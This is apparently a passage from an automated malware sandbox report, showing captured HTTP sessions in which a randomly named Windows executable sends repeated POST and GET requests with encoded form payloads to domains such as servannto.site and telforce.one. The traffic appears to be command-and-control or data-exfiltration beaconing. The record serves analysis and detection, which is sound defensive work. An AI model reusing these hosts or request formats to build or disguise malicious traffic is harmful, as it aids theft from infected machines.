                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.d63dm.top
                                                                  Referer: http://www.d63dm.top/rqnz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 62 2f 59 73 4f 6c 32 31 49 50 51 48 64 6a 4e 43 6f 53 46 50 57 38 72 37 47 36 45 58 33 73 76 44 67 67 4b 5a 66 32 31 38 45 58 74 67 76 77 4b 36 31 75 6d 58 74 73 2b 53 33 61 63 62 4f 5a 45 33 39 73 48 7a 76 7a 47 54 73 36 30 35 52 50 53 48 56 39 2b 52 57 49 78 67 68 4a 63 59 6f 39 74 78 76 6e 2b 39 2f 42 70 6a 32 65 76 4b 4f 68 61 39 62 54 7a 50 4b 36 59 63 4f 74 31 41 32 52 51 69 64 41 59 68 46 6d 55 77 49 53 4a 50 6c 6f 6b 54 58 7a 38 6f 41 73 56 46 67 51 52 73 64 6e 69 67 7a 38 42 38 78 30 54 5a 2b 72 4e 2b 32 45 70 54 74 6c 43 4d 44 67 57 45 56 67 66 39 41 4a 71 56 56 59 6c 6c 7a 54 44 64 44 6c 4a 48 6a 64 6e 56 5a 75 47 4e 52 6e 43 77 7a 65 30 78 51 48 70 66 39 50 52 50 42 30 75 43 55 7a 72 52 78 75 4c 63 53 50 4a 58 71 65 33 38 64 66 49 72 33 48 64 54 4c 2f 6c 61 72 73 37 42 54 59 77 68 67 38 31 74 78 51 4b 31 37 39 6a 36 72 4c 71 74 59 73 75 52 58 6b 6a 4d 32 38 56 79 6f 53 4d 4c 33 74 38 65 76 51 36 78 42 35 49 67 36 6f 6a 66 65 5a [TRUNCATED]
                                                                  Data Ascii: NjHpTfh=24JOOXJ8e4hNb/YsOl21IPQHdjNCoSFPW8r7G6EX3svDggKZf218EXtgvwK61umXts+S3acbOZE39sHzvzGTs605RPSHV9+RWIxghJcYo9txvn+9/Bpj2evKOha9bTzPK6YcOt1A2RQidAYhFmUwISJPlokTXz8oAsVFgQRsdnigz8B8x0TZ+rN+2EpTtlCMDgWEVgf9AJqVVYllzTDdDlJHjdnVZuGNRnCwze0xQHpf9PRPB0uCUzrRxuLcSPJXqe38dfIr3HdTL/lars7BTYwhg81txQK179j6rLqtYsuRXkjM28VyoSML3t8evQ6xB5Ig6ojfeZNY03vA3kKgyy2ZouzzuY6EzCV9KG5gz2o4hieeV0lmEMrTYpddzwbGM+0Hu4PsZCrAQgRSrrCEmF3o2Oqi3a4sx2GRjBAEFgF8lzFhMJCjQMPDSvChPXyxYNLMkrrs1P1xkIM+Y74PCB/MwtJwzmr2tp4ECSE+1K5ugb2rokrIZsC9hNkI6Ci1fAlidebkvTBXpQ9GzBeF9Yr+7flMdrPKxaWDnC4nbvasLZm5vYrq5O+qL/gm0NnuEa55HAc47UZXr3AwviWjwShaP+QbMBzo/Lo5wCY++CMU6+8iuK9s3sFs3A03OkZ1ZbMcwzu5HXEe85MiO9CSyRhpZ6oC4/wKA32ApNb2MQY5/+/0hvK+dQN0Jel1F41TdRAIfFk+1aKfw+mB/c2RcLirt5IKTQNMjfzBaIEyBUtfZmWDdPMovz8OXlqVTqBV6i1ps+kmDos+Fc93HOT9i5wIRG9Un6/NnzmrGkETQ8+da9CJBIxpkZ2wVOjeO8PNPqmE8kOffKSUdP/L4D02NOHClm+QH0/DAGd0ciwVAAI2njJonBNNc8/7YIBKP5qdlKiNVT1CeXdKxXfU/jrM9BP2MAppLq7Ax0iyu7taFSid9vq+o39r3xQzidtca2N3qmCTAnppx2SpBgXdXLnaf8gGmc3O0+TZV3QYl7GdFTay [TRUNCATED]
                                                                  Nov 22, 2024 14:46:43.418164968 CET302INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:43 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 138
                                                                  Connection: close
                                                                  ETag: "669137aa-8a"
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.849736154.23.184.218801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:44.510334969 CET550OUTGET /rqnz/?NjHpTfh=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tZILeOOALNuMLpp3tbYRhrZPyWqW3RF19Jr1EDacfA/CTw==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.d63dm.top
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:46:46.132545948 CET302INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:45 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 138
                                                                  Connection: close
                                                                  ETag: "669137aa-8a"
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.84973731.31.196.17801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:51.763345957 CET813OUTPOST /h26k/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.servannto.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.servannto.site
                                                                  Referer: http://www.servannto.site/h26k/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4b 66 4a 4c 57 45 76 65 64 2b 44 72 46 65 77 37 58 44 7a 4d 56 4f 75 51 44 57 59 43 78 6b 47 70 6f 33 33 44 75 46 35 67 36 2b 58 35 64 73 45 42 46 69 52 42 45 35 2f 79 55 6f 52 4e 4c 4f 4e 66 76 35 78 68 44 6f 79 2f 44 59 65 6a 37 52 6f 35 51 59 61 65 4e 50 50 32 4b 59 4f 39 73 7a 53 6a 4e 78 77 66 6f 77 75 64 6c 32 47 4a 6a 32 38 7a 7a 46 4f 57 31 57 34 36 72 76 70 2b 43 65 35 55 71 30 6e 54 35 46 38 4f 36 69 4d 68 54 79 57 2f 2f 72 75 2b 74 4a 48 6a 6d 56 68 54 45 71 59 74 70 47 6b 35 4b 4b 71 50 61 56 4d 39 4b 6f 2f 41 48 2f 30 78 6b 71 45 4c 54 61 6f 3d
                                                                  Data Ascii: NjHpTfh=6DLu6QMM1jamKfJLWEved+DrFew7XDzMVOuQDWYCxkGpo33DuF5g6+X5dsEBFiRBE5/yUoRNLONfv5xhDoy/DYej7Ro5QYaeNPP2KYO9szSjNxwfowudl2GJj28zzFOW1W46rvp+Ce5Uq0nT5F8O6iMhTyW//ru+tJHjmVhTEqYtpGk5KKqPaVM9Ko/AH/0xkqELTao=
                                                                  Nov 22, 2024 14:46:53.207158089 CET375INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:52 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.84973831.31.196.17801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:54.531384945 CET833OUTPOST /h26k/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.servannto.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.servannto.site
                                                                  Referer: http://www.servannto.site/h26k/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4c 38 52 4c 55 6e 48 65 52 4f 44 6f 4c 2b 77 37 64 6a 7a 49 56 4a 6d 51 44 58 74 48 78 77 71 70 6f 57 48 44 68 68 74 67 2f 2b 58 35 56 4d 45 49 4c 43 52 4b 45 35 37 41 55 73 52 4e 4c 50 74 66 76 38 64 68 43 59 4f 38 44 49 65 68 77 78 6f 37 55 59 61 65 4e 50 50 32 4b 59 61 44 73 7a 61 6a 4d 46 4d 66 75 55 61 65 73 57 47 57 72 57 38 7a 33 46 4f 53 31 57 35 66 72 75 31 41 43 63 78 55 71 33 7a 54 67 77 49 4e 67 79 4e 6f 4d 43 58 2b 7a 35 37 50 6b 49 44 44 74 7a 39 48 41 72 77 4d 6c 51 56 54 51 6f 69 4a 5a 56 6b 57 4b 72 58 32 43 49 70 5a 2b 4a 55 37 4e 4e 38 53 4c 78 38 46 6d 52 70 42 75 4c 4a 4a 56 66 6c 44 43 35 64 5a
                                                                  Data Ascii: NjHpTfh=6DLu6QMM1jamL8RLUnHeRODoL+w7djzIVJmQDXtHxwqpoWHDhhtg/+X5VMEILCRKE57AUsRNLPtfv8dhCYO8DIehwxo7UYaeNPP2KYaDszajMFMfuUaesWGWrW8z3FOS1W5fru1ACcxUq3zTgwINgyNoMCX+z57PkIDDtz9HArwMlQVTQoiJZVkWKrX2CIpZ+JU7NN8SLx8FmRpBuLJJVflDC5dZ
                                                                  Nov 22, 2024 14:46:55.800420046 CET375INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:55 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.84973931.31.196.17801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:57.324260950 CET1850OUTPOST /h26k/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.servannto.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.servannto.site
                                                                  Referer: http://www.servannto.site/h26k/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4c 38 52 4c 55 6e 48 65 52 4f 44 6f 4c 2b 77 37 64 6a 7a 49 56 4a 6d 51 44 58 74 48 78 78 2b 70 6f 6b 50 44 75 6d 42 67 34 2b 58 35 62 73 45 4e 4c 43 52 74 45 39 66 45 55 73 56 33 4c 4b 70 66 75 65 56 68 4b 4b 71 38 4e 49 65 68 2f 52 6f 36 51 59 62 65 4e 50 2f 71 4b 59 4b 44 73 7a 61 6a 4d 45 63 66 75 41 75 65 71 57 47 4a 6a 32 39 38 7a 46 50 4e 31 57 78 6c 72 75 77 31 43 73 52 55 72 58 6a 54 69 69 67 4e 34 69 4e 71 50 43 57 74 7a 35 6e 55 6b 49 50 68 74 7a 68 74 41 6f 51 4d 6d 78 68 4e 46 71 36 6d 62 54 6b 5a 4a 62 6a 38 4d 61 74 32 67 62 70 50 45 2f 6f 6f 63 6e 63 76 6e 77 4a 68 6a 5a 34 64 48 62 59 4d 4c 75 35 58 6c 4e 31 6b 52 56 5a 70 4e 56 56 79 7a 42 56 72 55 61 2b 77 78 5a 71 37 2f 6c 33 64 6c 6e 79 73 4a 55 72 56 73 78 70 72 77 45 4d 5a 33 6c 2f 58 53 31 2f 65 42 70 47 43 2f 58 46 59 52 63 4e 38 52 64 79 53 2f 44 46 51 6a 6c 2f 4f 59 64 49 64 4b 64 4f 4c 73 49 52 38 73 39 53 6a 57 50 52 78 69 6a 51 42 36 4a 6e 45 2b 67 51 6a 50 49 [TRUNCATED]
                                                                  Data Ascii: NjHpTfh=6DLu6QMM1jamL8RLUnHeRODoL+w7djzIVJmQDXtHxx+pokPDumBg4+X5bsENLCRtE9fEUsV3LKpfueVhKKq8NIeh/Ro6QYbeNP/qKYKDszajMEcfuAueqWGJj298zFPN1Wxlruw1CsRUrXjTiigN4iNqPCWtz5nUkIPhtzhtAoQMmxhNFq6mbTkZJbj8Mat2gbpPE/oocncvnwJhjZ4dHbYMLu5XlN1kRVZpNVVyzBVrUa+wxZq7/l3dlnysJUrVsxprwEMZ3l/XS1/eBpGC/XFYRcN8RdyS/DFQjl/OYdIdKdOLsIR8s9SjWPRxijQB6JnE+gQjPIUki1W578g9EZC3wc3VacExEOVugJZofnFI2ENiCU0mOBx0Sx/FJYtLfjBCMCuWE9ns9FpzRW97oVinqDBgBIbOUf421Q3prl5vhoQZEG4TRYZyHPzx9kuuSfRH9n4jowkGezNzi7TwSkg5eIwvsGKrxTC8usJJ/OIjIvppM8VRdaMq26dk+YagxdkoFp/cQ5D+PP7240f5Wi0ilhKR2Klc4A7HicX3q92HoFI8q/OxkvCmpO1gASL45H9fT9qg2fmYGqTf2HJb+7AAAvNrMC3N83ms7EgRPk8QN6KcDojRAszz6ncl/H5GBxYqvmcEj+e2Dg8e1kp8Z+ib8TSbD+r3WiaeY00QCUT11sxLrQfsyeluVr0QBa+uYYJ28jtNRDLs9ow0mPbc9LnCzieUYRbFYTCbMGTjMAMqGYdOClwfDGNgMdpmgpCFdQ3nSaJtVvVh3loJ7ghN+LSUo5nTsD/F3mudPp7MRf2vhTRulYTDzw2TqDIhVWSeRp+Iw0lE1DdVrEHQLYRUeuZNHWwre/jpzzqCtRu6dB1c1cg9A1rCPC7zvbSgZznyMD5tFrSsQ/DKKz3C9VwI6mVrqWQB25RYY3nhFIoXc/YreMgNogoT+ccy1tqtjNaipGXghxJ/EjMBc4v35d8xYWRAp2pYRVT9dD4eB6Bd4nzk [TRUNCATED]
                                                                  Nov 22, 2024 14:46:58.697161913 CET375INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:58 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.84974031.31.196.17801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:47:00.031788111 CET555OUTGET /h26k/?1fo=GF14svyhH44dt&NjHpTfh=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ5+lxyBJff7SJaPEJKSXzAPLDFQjr1SUqUGQs1Ux+2nJpQ== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.servannto.site
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:47:01.304291010 CET733INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:47:01 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                  Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.84974164.190.63.222801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:47:07.265989065 CET807OUTPOST /ykhz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.telforce.one
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.telforce.one
                                                                  Referer: http://www.telforce.one/ykhz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 54 6c 59 58 50 45 64 70 63 68 47 44 7a 4c 6f 51 6a 4d 4f 47 4e 58 52 37 41 78 32 79 49 44 31 42 30 7a 51 31 55 2b 67 6a 32 6a 36 33 4b 4c 70 43 45 2f 48 61 42 4b 6b 76 73 4c 73 36 51 62 33 51 35 6e 33 46 53 7a 6a 4b 72 44 70 2f 63 58 6e 65 6d 67 64 41 77 44 39 4c 2f 64 4c 49 47 79 47 2f 38 78 66 38 65 53 52 48 57 2f 4d 53 43 4c 4b 5a 79 49 44 51 4c 48 30 76 7a 6d 61 41 4e 63 42 67 38 6a 4d 4f 61 42 48 71 48 4e 51 4a 4c 41 64 77 51 41 37 72 77 57 55 50 36 2b 4f 58 31 46 71 34 74 41 4b 42 53 47 37 62 36 68 67 72 36 2f 49 4c 35 79 6d 74 49 5a 4c 4f 71 55 31 6f 76 57 34 64 32 5a 37 47 77 64 4d 3d
                                                                  Data Ascii: NjHpTfh=TlYXPEdpchGDzLoQjMOGNXR7Ax2yID1B0zQ1U+gj2j63KLpCE/HaBKkvsLs6Qb3Q5n3FSzjKrDp/cXnemgdAwD9L/dLIGyG/8xf8eSRHW/MSCLKZyIDQLH0vzmaANcBg8jMOaBHqHNQJLAdwQA7rwWUP6+OX1Fq4tAKBSG7b6hgr6/IL5ymtIZLOqU1ovW4d2Z7GwdM=
                                                                  Nov 22, 2024 14:47:08.567526102 CET707INHTTP/1.1 405 Not Allowed
                                                                  date: Fri, 22 Nov 2024 13:47:08 GMT
                                                                  content-type: text/html
                                                                  content-length: 556
                                                                  server: Parking/1.0
                                                                  connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
